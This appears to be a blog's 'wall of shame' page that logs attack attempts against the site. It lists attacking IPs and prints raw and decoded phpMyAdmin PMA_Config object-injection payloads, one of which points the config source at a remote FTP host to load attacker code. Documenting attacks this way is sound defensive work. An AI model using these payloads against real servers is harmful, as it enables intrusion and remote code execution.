Welcome to Exploit KB Wall of Shame!
This section will contain details about various attack attempts on this blog.
95.168.191.160
This address 95.168.191.160 is starring in my logs trying to access the blog login page.
I see post requests containing the following data: “%C2%EE%E9%
The strange thing is that the data of the post request is the same.
203.197.151.38
Attacking IP: 203.197.151.38
Request URI:
/phpmyadmin/index.php?session_to_unset=123&token=d42abd21e630a17c8d19427a106d3a3d&_SESSION%5B!bla%5D=%7cxxx%7ca%3a1%3a%7bi%3a0%3bO%3a10%3a%22PMA_Config%22%3a1%3a%7bs%3a6%3a%22source%22%3bs%3a71%3a%22ftp%3a%2f%2f670473%3a123456%4081s0fucr65.host-ed.net%2f81s0fucr65.host-ed.net%2ft.txt%22%3b%7d%7d
Decoded Payload:
[!bla]=|xxx|a:1:{i:0;O:10:"PMA_Config":1:{s:6:"source";s:71:"ftp://670473:123456@81s0fucr65.host-ed.net/81s0fucr65.host-ed.net/t.txt";}}
111.94.106.159
Attacking IP: 111.94.106.159
Request URI:
/phpmyadmin/index.php?session_to_unset=123&token= d42abd21e630a17c8d19427a106d3a 3d&_SESSION%5B!bla%5D=% 7cxxx%7ca%3a1%3a%7bi%3a0%3bO% 3a10%3a%22PMA_Config%22%3a1% 3a%7bs%3a6%3a%22source%22%3bs% 3a42%3a%22%2ftmp%2fsess_ n931qdag21g0vtvmfdg4k996jh8svu 97%22%3b%7d%7d
Decoded Payload:
SESSION[!bla]=|xxx|a:1:{i:0;O:10:"PMA_Config":1:{s:6:"source";s:42:"/tmp/sess_n931qdag21g0vtvmfdg4k996jh8svu97";}}
Recent Comments